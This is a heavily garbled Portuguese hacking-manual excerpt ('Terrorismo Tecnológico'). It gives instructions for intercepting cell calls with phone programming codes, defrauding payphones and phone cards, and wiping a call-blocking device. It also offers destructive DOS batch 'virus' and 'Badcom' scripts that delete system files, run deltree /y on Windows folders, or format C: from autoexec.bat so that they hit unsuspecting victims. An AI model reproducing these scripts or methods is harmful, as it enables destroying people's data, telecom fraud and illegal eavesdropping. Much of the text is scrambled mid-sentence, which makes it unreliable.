os avisamos que fazer escuta celular e ilegal de acordo com a ECPA, e estas in ente para uso e
opósito educacional, deixando claro que não me responsabilizo lo mau uso das informações aqui contidas. TV VHF canais 70 - 83 gue a melhor distribuição do melhor tronco usado pelos celulares.
ste e o que distribui nesse fluxo. Sintonize esses canais, ustando-os a sua atual freqüência e você estará preparado para
escuta. Cada canal da TV obrigara 5 MHz com ótimo ntrole de sintonia. Se mesmo assim você não tiver uma
ata você precisara ler sobre freqüência e terá uma boa obter uma exata. Se a sensibilidade não estiver boa,
, ou perto de uma freqüência exata, a coisa. Você poderá também pegar
ócios no tronco móvel se o mesmo estiver nsmissões não serão ilegais a menos que a conversa
o você poderá usar a velha TV para achar que use freqüências de 800 MHz ou
C5. Escuta celular
i tem diversão, e como tem... Você não tem idéia da importância de uma escuta celular! Faça isso perto de um banco e você
N
formações são exclusivamprpepeEajfazer acofreqüência exidéia de comomesmo você estando na cidadevocê pegara algumtransmissões de negfechado, as traesteja codificada, entãoutro local de negócios superior.
A
Terrorismo Tecnológico Aprenda Para Sobreviver
126
entendera. Para começar, esqueça todos os papeis laminados que você já usou na sua vida, tanto para escuta celular quanto para clonal, como já mostrei lá em cima, que não precisara de papel alumínio. Tudo que você vai precisar e de um celular Motorola! Repito: Meu celular para testes e um Motorola Elite II. Bom, dando
icio a explicação de escuta celular, você tem que entrar no modo programação do seu celular. Para isso precisa digitar: FCN 00 **
83 78 66 33 STO. Agora d vira como um ENTER da a máquina no seu celular. Ai você escolhe a freqüência. Tem
tavam fazendo escuta celular muito facilmente e resolveram
ficultar. Os celulares atuais estão usando apenas duas qüências, que são 300 MHz e 800 MHz. Para acessa-las, você
precisa entrar n depois 08# e pois 11300# (no caso da de 300 MHz) e # para dar um "encher".
inde
igite # # que sersugente ai falando que só existem duas freqüências, mas isso e bobagem de quem não tem mais o que fazer e fica tirando a esperança de listeners de plantão! O que essas pessoas ficam falando e que só existem as freqüências fortes e que as de sinais intermediários não podem ser burladas. BULLSHIT! O problema e que essas pessoas não sabem que os celulares novos não pegam outras freqüências mais, pois as empresas perceberam queesdifre
o modo de programação, digitar #deSe mesmo assim não pegar, vai pro centro da cidade, lá eu te garanto, a não ser que você more numa floresta. Use os canais 300, 385, 799, 991!
5.8 Telefones Públicos
Índice
Terrorismo Tecnológico Aprenda Para Sobreviver
127
D1. Cartão
2. Grafite D3. Esmalte de Unh
4. Água Cândida
7. Cartões Infinitos 8. Plucking Block Line 9. Aretha Sem Fichas
D10. Fazendo Orelhao To
ote o cartão normalmente, assim que a pessoa atender segure o mero 9 e retire o cartão, fique segurando o número 9 ate acabar falar! Assim você poderá fazer ligações com o cartão e gastar
apenas uma unidade ém funciona com o (zero).
a assim, ele tem uns 50 fuziveiszinhos, cada ligação gasta
om força, bote no lefone publico e pronto, mas lembre-se, rabisque com força e mpre que o grafite começar a acabar passe o grafite novamente!
Da Incolor
DD5. Papel Alumínio D6. Silicone DDD
car Sozinho
D1. Cartão Bnúde
do cartão. Este truque tamb0
D2. Grafite O grafite e um material super condutor de energia, e o cartão funcionele queimado um fuzível, então o nosso amigo grafite que e condutor de eletricidade não deixa queimar os fuzíveis. Proceda da seguinte maneira: rabisque os 2 lados do cartão ctese
D3. Esmalte de Unha Incolor
Terrorismo Tecnológico Aprenda Para Sobreviver
128
O esmalte impede que esses fuzíveis queimem, faça também essecom os cartões dparte de traz do cartão, e no de vídeo game passe na parte magnética!
e vídeo game (divertilandia)! Passe esmalte na
da fita
D4. Água Cândida
folha! Dai, coloque o de ndida (Vá a uma loja de limpeza e peça se não 3 ou 4 dias a tinta do cartão ira sair, depois
ações ficarão infinitas (também se pode usar água nitária).
D5. Papel Alumínio
Pegue o cartão telefônico novinho emmolho na água câsouber), depois depegue papel alumínio e cubra as partes metálicas com o papel alumínio, então coloque o cartão no orelhão, ligue e faça a festa porque as ligsa
E só pegar um pedaço de papel alumínio e enrolar no cartão, pode usar a vontade...
D6. Silicone Este e o método mas fácil e comprovado por mim. Pegue aquela silicone (transparente) e passe bem fina (fina mesmo) camada de silicone por cima, deixe secar e mais tarde você Vera um cartão que funciona infinitamente!
D7. Cartões Infinitos
Terrorismo Tecnológico Aprenda Para Sobreviver
129
Atenção: esta dica tem que ser realizada com muita paciência, pois você errar apenas um detalhe estraga tudo! Primeiramente nsiga um estúpido cartão telefônico zerado! Lixe ele com aquela
lixa bem fina e d 3 ou 4 minutos. assados então cerca de 3 a 4 minutos percebera que a tinta do
ra já tiver totalmente desaparecida você percebera como a confecção
---------------
Em cada bolinha ligada por um fio que nem diz o -o )
coloque um papel laminado bem fino para interligar nhas. | Ou também pode ser usado um fio bem fino. |
============ | bolinha 1|
_____ / \ _____ /
amigo papel laminado ou fio no e pronto!
seco
eixe-o em repouso durante Pcartão nas costas da figura saiu. Quando a tinta nas costas da figuesdo cartão e uma merda. E um negocio desse tipo: Costas do cartão --| o-o o-o o-o | | o-o o-o o-o |desenho ( o| o-o o-o o-o |as duas boli| o-o o-o o-o| o-o o-o o-o----------------- _____ ____ / \ / \ / \ / \ | bolinha 1|\ / \ / \ Cubra da bolinha 1 ate a 2 com o nossofi
D8. Phucking Block Line
Terrorismo Tecnológico Aprenda Para Sobreviver
130
Essa técnica e meio forçada, mas funciona. Nosso alvo saBLOCK LINE. Bem, isso e só uma parte porque já estamos imaginando uma matéria futura sobre o si
ão aqueles parelhos que bloqueiam chamadas telefônicas, o tão temido
stema, porém englobando-de forma muito mais ampla e falando mais dos detalhes técnicos. or enquanto espero que isso quebre o galho. A primeira coisa que ve ser feita e descobrir se o problema e realmente o BLOCK LINE
e se a linh Antes de do olhe se a senha padrão que e 222 não foi mudada. Agora
ste método só funciona em telefones antigos, aqueles a base da hinha ou da moedinha (se estiver nos EUA, usa o Rex Box ).
Por exemplo, (número
tício). Primeiro voce deve diminuir de 10 todos os números que
o Pde
a não foi bloqueada na companhia telefônica.tuprocure o telefone principal da casa, aquele que quando desligado desliga a todos da casa. Abra ele com uma chave de fenda e procure uma caixinha preta escrita Bloch line. Abra agora também o block line, com cuidado pra não quebrar. Apos ter feito isso tire a película que cobre a placa do aparelho block line e exponha o circuito à luz fluorescente (raios ultravioleta). Pronto, você apagou todas as informações da placa! Agora e claro que as pessoas nem vão desconfiar qual o problema...
D9. Orelhão Sem Fichas Efic
o número que você quer ligar e 823-2647 ficcompõem o telefone a ser discado, no caso esse telefone ficaria como segue abaixo. Número a ser discado: 823-2647 ORIGINAL (10 - 8) = 2 (10 - 2) = 8 (10 - 3) = 7
Terrorismo Tecnológico Aprenda Para Sobreviver
131
(10 - 2) = 8 (10 - 6) = 4 (10 - 4) = 6
0 - 7) = 3 VO NÚMERO
novo número será: 287-8463 O que você vai ter que fazer e bater no bocal do telefone o número de vezes correspondente a subtração. Bata 2 vezes no bocal ( intervalo de 2 segundos ) Bata 8 vezes no bocal ( intervalo de 2 segundos ) Bata 7 vezes no bocal ( intervalo de 2 segundos ) Bata 8 vezes no bocal ( intervalo de 2 segundos ) Bata 4 vezes no bocal ( intervalo de 2 segundos ) Bata 6 vezes no bocal ( intervalo de 2 segundos ) Bata 3 vezes no bocal ( intervalo de 2 segundos ) Desta maneira você poderá fazer ligações gratuitas. Quando estiver ágil poderá ligar mais rápido, ai fica fácil!
D10. Fazendo Orelhão Tocar Sozinho Trata-se de como fazer um telefone publico tocar. E muito simples, não vou explicar como esse código funciona, pois embora pareça simpscc amos supor que você esteja na minha cidade e queira fazer esse método, então você digitaria no telefone publico 9090222999999999999999999, espere um pouco e você escutara aquela mulher da telefonia falando: "Chamada a cobrar, para aceitá-la, continue na linha apos a identificação..." Assim que a mulher começar a falar, desligue o telefone, saia de perto e espere.
(1|_______ NO O
les foi bem complexo para descobrir, já que envolveu todo o istema de telefonia. Apenas chegue no orelhão e digite o código de hamada a cobrar (varia de cidade para cidade), no caso da minha idade o código e 9090. V
Terrorismo Tecnológico Aprenda Para Sobreviver
132
O telefone começara a tocar em uns 30 segundos, e com certeza valera a pena ver aquele bando de lammers ignorantes atendendo!
5.9 Observações sobre clonagem
A cl nagem é algo muito comum cos os celulares, tambem não era de se esperar outra coisa já que une a facilidade de fazela com os altos precos da tarifacao celular. Com o CDMA as operadorar dizem que não é possivel fazer a clonagem, pura mentira, já que perto de aeroportos por exemplo o sinal se torna analogico, e com um simples escanner de sinais é possivel pegar o codigo Hex, entao tomem cuidado ao ir nesses lugares, ou travem o seu celular para apenas funcionar em modo Digital. Outra onda crescente é colocar linhas de orelhao nos celulares. Isto funciona pois a linha analogica funci na parecidamente com a do celular. Entao da para se fazer esta malandragem com cerca de 20 celulares para cada linha do orelhao. Isso tudo é CRIME!
o
o
Terrorismo Tecnológico Aprenda Para Sobreviver
133
Capítulo VI
Vírus - Sem dúvida nada mais assusta usuários e administradores do que os vírus, estas pragas cibernéticas estão se ma força maior e numa escala geométrica.
espalhando nos sistemas a cada dia com u
Terrorismo Tecnológico Aprenda Para Sobreviver
134
Introdução
Navegando na Internet, lendo e-mails, baixando arquivos ou programas, lendo um disquete de um amigo ou até um cd-rom de uma banca de jornal podemos pegar um vírus. Qualquer que seja o tipo extensão que o arquivo tiver não podemos descartar a hip
você executar uma tarefa de forma repetitiva no Microsoft Wo
único comando para executar uma tarefa automaticamente e o woed já vem com vários macros instalados e você ainda pode configurar um novo macro.
2. Para combinar vários comandos; por exemplo, inserir uma tabela com bordas e tamanho específico, e com um determinado número de linhas e colunas.
3. Tornar uma opção de caixa de diálogo mais acessível.
4. Automatizar uma seqüência complexa de tarefas.
O Word oferece duas maneiras de criar uma macro: a gravação de
ótese de ser um trojan ou vírus. Mesmo em uma foto ou em um Mp3 ele pode vim escondido e infectar todo o sistema.
6.1 Vírus de macro
Serd, poderá automatizá-la usando um macro. Um macro é uma
seqüência de comandos e instruções do Word que você agrupa como um
Algumas utilizações típicas dos macros são:
1. Acelerar as tarefas rotineiras de edição ou formatação.
macro e o Editor do Visual Basic.
Terrorismo Tecnológico Aprenda Para Sobreviver
135
Para acessar rapidamente a macro, você poderá atribuí-la a uma barra de ferramentas, um menu ou teclas de atalho. Para exe
Se você der a um novo macro o mesmo nome de um comando inte
o, se você gravar um novo macro e nomeá-la ArquivoFechar, ela ficará anexada ao comando Fechar. Quando você escolher o comando echar, o Word executará as novas ações gravadas.
O QUE É UM VÍRUS DE MACRO?
ionar em nív to é ele age no próprio sistema como o Windows 9X, Windows ME... e até alguns no Unix. Muitas vez o S.O., mas sim em nível aplicativos.
nco de dados, utilizam linguagens de macro. E muitas aplicações têm a função de auto-executar estes macros, esses por sua vez serv m para o funcionamento do aplicativo.
Porém e anificar seriamente to ério perigo para usuários de computadores que pensavam que arquivos de dados não machucavam seu sistema.
cutar a macro, basta clicar no botão da barra de ferramentas ou no comando de menu, ou pressionar as teclas de atalho.
rno do Word, as ações do novo macro substituirão as ações existentes. Por exempl
F
Os vírus comuns geralmente se concentram em funcel de sistemas operacionais, is
es os programadores que o criam os fazem trabalhar não n
Alguns aplicativos que trabalham com planilhas eletrônicas, processadores de texto e ba
e
sses macros se forem reescritos, podem ddo o sistema. Essa combinação fornece um s
Então cada vez que o aplicativo é aberto, acaba executando
automaticamente esta macro e o vírus ou trojan se espalha no sistema.
Terrorismo Tecnológico Aprenda Para Sobreviver
136
Ele pode ter varias finalidades, como roubar informações, atrapalhar oredisco rígido ou infectar arquivos comuns a ele como alguns que apenas estragam documentos do Microsoft Word.
Removendo um vírus de macro.
sistema, apagar arquivos de seu disco rígido, nomear arquivos existentes, copiar arquivos pessoais de seu
- opção comand do arquivo e do normal.dot
- Caso o arquimacros
e em segurança de macro.
Para remoçar siga os pacos a seguir:
Inicie o Word -
Se o arquivo infectado já estiver aberto, no utilitário escolha ao de macro, lá apague todas os macros
vo não estiver aberto então apague somente os do normal.dot
Alterar o nível de segurança para proteção contra vírus de macro
. - Em ferramentas, clique em opções
- Clique na guia segurança.
- Em segurança de macro, cliqu
Terrorismo Tecnológico Aprenda Para Sobreviver
137
- Clique na guia segurança que deseja usar.
nível de segurança e selecione o nível de
Como eliminar seqüelas dos vírus?
ras de Ferramentas personalizadas), elas serão perdidas. Mas pelo menos, você tem a certeza de que as seqüelas sumirão.
Agora, de nada a inda tiver algum
do mento do Word tador, que pode infectar o NORMAL.DOT novamente a qualquer momento. Passe o antivírus antes d
Depois de terminar o reparo, não esqueça de colocar o novo
Pode ser que, mesmo depois de eliminado o vírus de macro, ainda restem algumas seqüelas no seu Word: menus faltando, botões a menos, travamentos, combinações de teclas desativadas.
Primeiro, tente seguir as dicas que você encontra nesta pagina, no site da McAfee: http://www.mcafee.com/t0118.html. Lá, você pode retirar o programa DocFix, especifico para resolver estes problemas.
Se não der certo, há uma solução radical, mas eficiente, a ser tentada em ultimo caso. Delete o arquivo NORMAL.DOT automaticamente, o Word criara outro NORMAL.DOT, com as configurações padrão do programa. A desvantagem e que você perderá as suas configurações personalizadas: se você tinha alguma configuração personalizada (Autotexto, Macros, bar
dianta tudo isto se você a infectado no seu compucu
e fazer o descrito acima.
NORMAL.DOT como somente-leitura.
Terrorismo Tecnológico Aprenda Para Sobreviver
138
Guia o que fazer ao encontrar um vírus de
• Reparar o arquivo – cer de antivírus conseguem remover o vírus e manter a integridade e o arquivo funcionando descontaminação. O antivírus deve remove
macro?
tas ferramentas de um arquivo
perfeitamente após suar o vírus do arquivo, e caso a ameaça for
um worm ou Cava• Colocar o arq
Torna o arquivo inacessível para qualquer programa que não o próprio antivírus. Dess abrir o arquivo por acaso e, assim, dissem
• Excluir o arquivoobs: Use essa opção onar.
É muito importante inais comuns de um vírus: mensagens incomuns que são exibidas na tela, desempenho d apacidade de acessar sua
podem conter vírus. V tes e unidades antes de copiar ou abrir arquivos, ou antes, de iniciar o computador a p
Tenha pelo menos de detecção de vírus comercial e use-o regularmente para verificar se há vírus no seu computador. Certifique-se de obter os mais recentes arquivos de
lo de Tróia, exclui o arquivo. uivo em quarentena
e modo, não é possívelinar o vírus.
caso as duas a cima não funci
6.2 Vírus
conhecer alguns s
e sistema reduzido, perda de dados e inc unidade de disco rígido entre outros.
Programas em disquetes e unidades removíveis tambémerifique todos os disque
artir deles.
um programa
Terrorismo Tecnológico Aprenda Para Sobreviver
139
assinatura de vír do estiverem disponíveis, pois novos vírus são criados todos os dias.
6.3 Ex vírus
Vamos vírus
us para o seu programa quan
emplos de
ver dois exemplos de
Exemplo truição"
Entre n -DOS
Apa S>
copy con arquivo.bat @echo off
@echo destru
del *.com
cd\ del arquivo.bat
1: -- "Autodes
o Prompt MS
recerá assim: C:\WINDOW
Digite: cd..
Aparecerá: C:
Digite: edit destuidor
Na tela azul que aparecerá, digite:
idor is r0x del *.sys del *.exe
cd windows del *.*
Terrorismo Tecnológico Aprenda Para Sobreviver
140
@echo destruidor
Salve o arquivo na opção Salvar Como. Pronto, um arquivo vírus de lote foi criado no seu computador.
Mais ele não fará nada contando que você não digite 'arquivo' no diretório onde ele está!
Remova este arquivo (arquivo.bat) para um disquete, junto a
C:\arquivo.batele um "autoexec.bat", com a linha de comando:
.
Exemplo 2: -- "HiperDestruição"
Entre no Promt Ms-Dos
Digite: cd..
A
Digite: edit Hacker
l que aparecerá, digite:
@Break off
e escolher)
Aparecerá assim: C:\WINDOWS>
parecerá: C:
Na tela azu
@Echo off
@Echo "Destruição total" (uma linha sem nada)
deltree/y C:\(pasta quTipo assim:
Terrorismo Tecnológico Aprenda Para Sobreviver
141
Se colocar -- deltree/y C:\WINDOWS -- Você vai deletar a pasta do Windows, junto com ela as *.DLL e assim já era o
sistema. Ou, pode ser assim -- deltree/y C:\Meus Documentos
Salve o arquivo na opção Salvar Como.
ed, Ping-Pong, Michelangelo...
6.4 Entendendo mais sobre vírus
Vírus de disco - exemplo: Ston
uivos. Da mesma forma que uma biblioteca precisa de um fichário para saber onde se en
ração de entrada e saída precisariam do uso dessa tabela. Salvar ou carregar um arquivo num disquete infectado possibilitaria a ativação do vírus, que pode
írus de Arquivo - exemplo: Jerusalém, Athenas, Freddy
Infectam o BOOT-SECTOR. Esta é à parte do disco
responsável pela manutenção dos arq
contram os livros, um disco precisa ter uma tabela com o endereço dos dados armazenados. Qualquer ope
ria infectar outros disquetes e o disco rígido. V
L, . MN tes vírus se copiam para o inicio ou fim do arquivo. Dessa for amar o programa, o vírus executara junto ao pro
Infectam arquivos executáveis ou de extensão.SYS, .OVU, etc. Es
ma, ao se chgrama. DIR-II Altera a tabela de arquivos de forma a ser chamado antes do
arquivo ou programas.
Terrorismo Tecnológico Aprenda Para Sobreviver
142
Detecção Demora maior na execução de um programa. O sistema fica
ma
o o vírus infe cente, pois sem a em que o arquivo foi atualizado sendo do micro ou por você.
o caso de vírus de disco, é possível que alguns arquivos do disquete desapareçam.
ualmente o aparecimento de mensagem acusando Bad
Cluster em todos os disquetes usados (não confundir com o que aco
a uma dic
C-XT, mas não funciona em um PC-AT.
alerta para modificação em seu arquivo (os novos pro
houver vírus na memória, pois isso infecta todos os arquivos que forem examinados.
Utilização de ferramentas como antivírus para visualização do
setor de Boot most Programa Windows deixa de funcionar ou congela
repetidamente às vezes dando erro de tela azul.
is lento em suas tarefas. Aumento no tamanho dos programas ou arquivos. Alteração na data de criação do programa. Quandcta, o programa aparece uma data de criação repre o sistema grava a última dat
N
Ig
ntece com um disquete de 360k formatado por engano para 1.2 de capacidade). Nos tempos do vírus Ping-pong, essa er
a de infecção. Disquete funciona em P Antivírusgramas antivírus não funcionam quando são modificados pela
infecção de um vírus). Não se deve utilizá-los mesmo quando possível se
ram modificações.
Terrorismo Tecnológico Aprenda Para Sobreviver
143
6.5 Como funciona um programa antivírus - Vigiando a memória do micro para ação de qualquer novo programa Mantendo um arquivo com as características do(s) arquivos
Antes da infecção. Ele examina o CRC, a data de criação do terísticas cuja alteração
denunciaria ação indevida.
- Abrindo cada um dos arquivos passiveis de infecção e
rama de computador que se copia sem intervenção
agem de baixo nível. sse
por uma linha utador.
a de código que ele tem armazenado
de alerta para o usuário.
6.6 Badcom
om são arquivos (.com) em que quando executados realizam determinada seqüência de tarefas no computador.
-
arquivo, o tamanho e outras carac
Examinando o código do programa. Lembrar que o vírus é um proghumana para outro programa ou boot sector. Um programa é composto de às vezes milhares de instruções em linguO que o programa antivírus faz é ler e"texto" dos arquivos executáveis (de extensão.COM, .EXE ou .OVL, (entre outros) e procurarde código característica de vírus de compO programa, ao encontrar uma semelhança entre o código do vírus e a linhna memória como pertencente a um vírus, aciona a mensagem
Badc
Terrorismo Tecnológico Aprenda Para Sobreviver
144
Não é nada mais do que um programinha feito em alguma linguagem e salvo como um arquivo .com que é rodado tanto em dos quanto em Windows.
Para isto deve-se fazer um arquivo de lote com os comandos e pilá-lo
O compilador de arquivos de LOTE (.BAT) é o com certeza é o melhor para fazer esta
Vejamos alguns comandos.
com
BAT2EXEC.COM operação.
ECHO OFF
omando para não ser mostrados as linhas de comando em uma um
anela.. C:\DIR
strados.
LS
la.
O
ativar o comando @ECHO OFF, e mostrar caracteres em ma janela xemplo: ECHO "Mensagem" Irá mostrar a mensagem na janela,
utomaticamente retorna a não aparição de comandos na anela.
r um arquivo com este comando, é necessário o comando ,
@ Cjanela do MS-DOS, Exemplo: Colocando o comando DIR em Badcom sem o @ECHO OFF no prompt ele mostrará o comando escrito na jCom o comando @ECHO OFF, ele simplesmente elimina os dígitosdos comandos a serem mo C Comando do MS-DOS, para limpar a te ECH Para desuEapós isso aJCriando arquivos com o comando ECHO: Para cria
Terrorismo Tecnológico Aprenda Para Sobreviver
145
exemplo: ECHO Nomedoarquivo.extensão Irá criar o arquivo no ambiente do MS-DOS... Para criar arquivos com textos ou comandos, é necessário fazer o
ra
chamado Eu.BAT (Arquivo de Lote) Com o
ste comando permite esconder um determinado arquivo, torne-o te para leitura, ou torne arquivo do sistema.
ara obter os comandos simplesmente digite na janela do MS-DOS:
ara Criar diretórios MEDODIR
diretórios vazios. NOME DA PASTA VAZIA'
DELETE
ara apagar arquivos, no Badcom é usado da seguinte maneira,
seguinte comando: ECHO ARQ.EXT "Comando ou mensagem" OBS: As aspas são apenas paindicação porém em comandos não funcionam as aspas. Ex: ECHO Eu.BAT DIR Irá criar um arquivocomando DIR dentro do mesmo. ATTRIB EsomenPATTRIB /? MD PEx: MD NO RD Comando para desfazerEX: RD ' DEL ou P
Terrorismo Tecnológico Aprenda Para Sobreviver
146
Para deletar arquivos sem ter problemas de BUG, é necessário fazer com
ndo não tenha a opção (*.*), pois surgirá um prompt de
ntão da seguinte maneira:
EL *.Extensão, exemplo.. para apagar os arquivos .INI do diretório : del c:\windir\*.ini ou use:
uitos não têm conhecimento do que este comando pode causar m um
sistema, pois é usado da maneira básica... o Mais perigoso comando contido em um Badcom.
Uso com BUG:
mais destrutiva, deletando todos os
sar o Deltree de forma destrutiva basta acrescentar a opção
s...
me é um comando para renomear algum arquivo.
que o comaconfirmação de exclusão. Digite e Ddo Windowsc: cd\ cd windir del *.ini DELTREE Me
Este "pode ser"
DELTREE DIRETORIO Só que com este comando, aparecerá a confirmação de exclusão do diretório. Porém ha uma opção no DELTREE que evita a aparição do prompt de confirmação, sendo ela a arquivos de um dir. Para u/Y no mesmo, Exemplo: C:\Deltree /y windows Excluindo window REN Rena
Terrorismo Tecnológico Aprenda Para Sobreviver
147
REN command.com command.cai
C:\> do Ms-dos pelo que
Por exemplo: PROMPT teste:\>
e ou volte para determinada
de
inado comando ... usando o comando CLS, veja:
onde vai ser voltado o
m-se dois ponto antes, outros exemplos são :START
REN Autoexec.bat autoexec.euu PROMPT
Com este comando você pode trocar o você quiser.
C:\> teste:\> GOTO Este comando faz com que o BAT pulparte do Programa. Exemplo: O uso do GOTO é muito usado se quiser que não pare repetir determ @echo off :INI <-- Indica a parte do programacomando Cls Usa :COMEÇO GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo indicado.
Terrorismo Tecnológico Aprenda Para Sobreviver
148
@ECHO OFF
Este comando "esconde" a ação!! Por exemplo, se você escreverdel *.* com o @Echo Off a vítima vai pensar que nada acmas se você não pôr o @Echo Off ela vai ver o que estacontecendo e vai ter tempo de desligar o
onteceu,
á computador!!
(indispensável num Badcon!).
CLS
". Por exemplo, se você quiser que não apareça nada Badcon.
Ex.: @Echo Off
cd windows
cls
ECHO
Este comando "mandar mensagens" para o indivíduo, por exemplo,
exibirá a seguinte mensagem: Você está perdido!!
"Limpa a telaquando a vítima executar o
Del *.*
del *.com del *.ini
se você escrever: @echo off echo Você está perdido!!
O Badcon
CD
Este comando serve para "criar" diretórios, exemplo: MD Hacker cria o diretório Hacker/
Terrorismo Tecnológico Aprenda Para Sobreviver
149
COPY
Serve para "copiar" arquivos, exemplo: :\windows
Ele copiará todos os arquivos soltos em C:\ (menos os diretórios)
arquivos determinados, exemplo: @echo Off
stes comandos ele deletará arquivos determinados, no caso o indispensável para funcionar o Windows. Sem ele
um Deltree, ele pegunta se quer realmente apagar e /y o bug não existe mais e ele
m perguntar a vítima!
RD Hacker
copy c:\*.* c
para C:\Windows
DEL
"Apaga"
cd\windows del win.com Com ewin.com, que énão dá para iniciar o Windows.
DELTREE
"Apaga os diretórios" existentes dentro de outros diretórios, exemplo: Deltree/y c:\ Ele apagará todos o diretórios existentes em c:\ ao contrário do del *.* que só apagaria os arquivos soltos em c:\. Aí você me pergunta: Por que o /y depois do Deltree?? Quando você dá determinado arquivo, mas com estapagará os arquivos direto se
RD
Comando para "desfazer diretórios" vazios no Bad-com, exemplo:
Desfaz o diretório Hacker
Terrorismo Tecnológico Aprenda Para Sobreviver
150
REN
"Renomeia" um arquivo especificado, exemplo:
tá renomeado para Hacker
mando é usado para "formatar" discos como o C:\ ou o A:\.
uer mesmo formatar.
Para números ou letras é necessário o uso do /c, sem o uso do comando /c somente CHOICE, mostrará o prompt: [Y,N]... ComO
RRORLEVEL. IF e ERRORLEVEL é um complemento usado pelo CHOICE Comando que possibilita o desenvolvimento de questões e prompts para o sacaniado: Os c andos CHOICE e IF ERRORLEVEL são comandos que um precisa do outro. Nenhum se mantém sozinho.
DOSKEY
O Doskey serve para "trocar" um comando por outro. Exemplo: DOSKEY DIR CLS Sempre que a vítima digitar DIR sera executado o comando CLS.
GOTO
Serv ara "ir" para determinado ponto do arquivo, exemplo: LOOP (local onde o comando GOTO retornará)
Ren autoexec.bat Hacker
O arquivo es
FORMAT
Este coSó que este comando vai perguntar ao usuário se ele tem a certezaque q
CHOICE
Comando que "possibilita um prompt para resposta". Exemplo: CHOICE /c123456789
o /c e os números irá mostrar: [1,2,3,4,5,6,7,8,9]... comando CHOICE tem que vir sempre acompanhado do IF e
E
om
e p
Terrorismo Tecnológico Aprenda Para Sobreviver
151
DIR GOTO LOOP Com isso o programa ficará dando DIR repetidamente
IF E
"Checa para ver se existe" determinado arquivo, e se existir realiza uma função, se não existir realiza uma outra finção. Exemplo: CD W a no diretorio Windows IF E T WIN.COM GOTO WIN: procura pelo arquivo win.com, se existir ele vai para o WIN:, se não ele vai para linha seguinte. CD W stia o diretorio windows, ele vai tentar o win-95 IF E T WIN.COM GOTO WIN: GOTO FIM: Vai para o FIM: WINDELFIM:Sabendo estes comandos já podemos fazer o nosso 1° Badcon:
Entre no edit do MS-DOS e digite os comandos abaixo e salve como "(nome).bat" (sem aspas e sem parênteses). Nun a extensão ".bat". Para entrar no Edit do MS-DOS, abra o MS-DOS e digite "edit" (sem aspas).
Exemplo de Badcom (obtido na Internet)
@echo off cd\ -----------------------> vai para a unidade de disco C:\ cd windows -------------------> entra no diretório Windows del *.com ---------------------> deleta todos os arquivos com extensão .com del *.sys ---------------------> deleta todos os arquivos com extensão .sys cd\ -----------------------> volta para a raiz de C:\ del command.com -------------------> deleta o arquivo command.com
XIST
INDOWS EntrXIS
IN-95 Como não exi
XIS
: WIN.COM Deleta o win.com Fim do arquivo
ca esqueça que o arquivo deve ser salvo com
Terrorismo Tecnológico Aprenda Para Sobreviver
152
(o do MS-DOS) echo Seu computador acabou de ser invadido por -=|Hacker|=- ----------> exibirá a mensagem digitada
ara escrever a badcom é usado qualquer editor de textos como o EDIT do DOS e depois precisa somente ser compilado.
P
Terrorismo Tecnológico Aprenda Para Sobreviver
153
Capítulo VII Bomba DOS – funcionamento e descrição.
Terrorismo Tecnológico Aprenda Para Sobreviver
154
7.1 O que os hackers chamam de Bomba DOS?
do muito fácil de constrência em program
Bomba DOS não são badcons e nem vírus, é um arquivo com uma única finalidade. Sen uir e um usuário com um pouco de experi ação em lote pode fazer uma Bomba DOS.
A Bomba DOS é um arquivo de lote, (*.BAT) contendo comando DOS com a função somente de destruir e não de recolher informações.
Então desconfie de arquivos BAT, nunca execute sem conferi-lo antes, já que o antivírus ncionar para ele. Para você ve uer editor de texto, desde o E co de notas do Windows,
de programação.
Ele destrói tudo sendo um tema operacional), arquivos, dad brar que As Bombas mais o aquelas que vem no AutoExec.bat, es icamente quando seu micro é ligad icar verificando o conteúdo deste arquivo, sendo assim tome cuidado com programas, jogos, e-mails.
EC > DE > DE E
não vai furificar o conteúdo do arquivo você poderá abri-lo em qualq
dit (DOS), Bloou Word, StarOffice... Só que para isso deve-se ter alguma noção
S.O (Sisos, enfim o que estiver pela frente. Também é valido lem
destrutivas sãte arquivo é executado automato, e não é sempre que você vai f
7.2 Vejamos alguns comandos:
CLS: Limpa a tela.
ECHO OFF : Desliga o atributo de mensagens. HO: Imprimi uma mensagem na tela. ex: ECHO <MensagemL: Apaga arquivos. ex: DEL [caminho] <Nome_do_ArquivoLTREE: Apaga uma estrutura de diretórios. ex: DELTRE
Terrorismo Tecnológico Aprenda Para Sobreviver
155
<diretório> ecla ser presPAUSE: Espera alguma t sionada para continuar a execução.
REN: Renomeia um arquivo REN <Nome_do_Arquivo> <Novo_Nome>
Algu ote:
Obs: Todos comandos escritos em NEGRITO terão que ser escritos no autoexec.bat.
Confirma : <S/N>
Como causar onsiderável.
@ECHO OFF IF EXI
IF S
Outros:
. ex.
ns exemplos de arquivos de l
CLS Disco de sistema inválido
PAUSE inicio da formatação da unidade C
ECHO OFF
um estrago c
ST C:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT EXIST C:\CONFIG.SYS DEL C:\CONFIG.SY
Como destruir de vez!
@ECHO OFF
FORMAT C: /A
Terrorismo Tecnológico Aprenda Para Sobreviver
156
APPEND Define um caminho de buscas para arquivos que não foram
encontrados. Parâmetros : path on, off: Aplicará um caminho de busca definido
ATTRIB Esse comando serve pa terminados arquivos.
Parâmetros : +r, -r : Define atributo de leitura
CD Muda para o specificado
CHOICE Esse comando possibilit lha. Necessita do IF e
ERRORLEVEL Parâmetros
/c: Possibilita uma esc lo progamador e não pe
nn: : Define o número de segundos de espera. De 00 a 99 text: Define um texto á ntes das opções de
/s: Faz diferenciação de letras minúsculas e letras ma s
Limpa a tela
DELTREE Deleta etório
/y: Não pede confirmação
D
por Append
ra ocultar de
+h, -h : Define atributo de oculto
diretório e
a uma esco
olha feita pelo default
ser exibido aescolha
iúscula
CLS
um arquivo ou dirParâmetros
DIR á um DIR
Terrorismo Tecnológico Aprenda Para Sobreviver
157
ECHO para exibEste comando serve ir uma escrita. Por
exemplo:
ros: OFF: Não mostra os comandos dados
Goto
o qual ele deve voltar
IF e ERRORLEVEL Complemento do CHOICE. Ele define o que vai acontecer. =)
7.3 Arquivo em Lote
Esta é outra for em precisa compilar é so digitar no promp ndo, como o exemplo a seguir:
copy bat <en
@echo off <en
@echo Fras referência <en
ECHO Quem ler isso é um tonto Ficaria assim:
Tonto !!!! Parâmet
Volta para um determinada parte do arquivo Parâmetros
:START: Marca o local para onde deve voltar START: Indica o alvo para
ma de se fazer um “vírus” em DOS, e nt de coma
con lote.ter>
ter>
e de sua pter>
Terrorismo Tecnológico Aprenda Para Sobreviver
158
<enter>
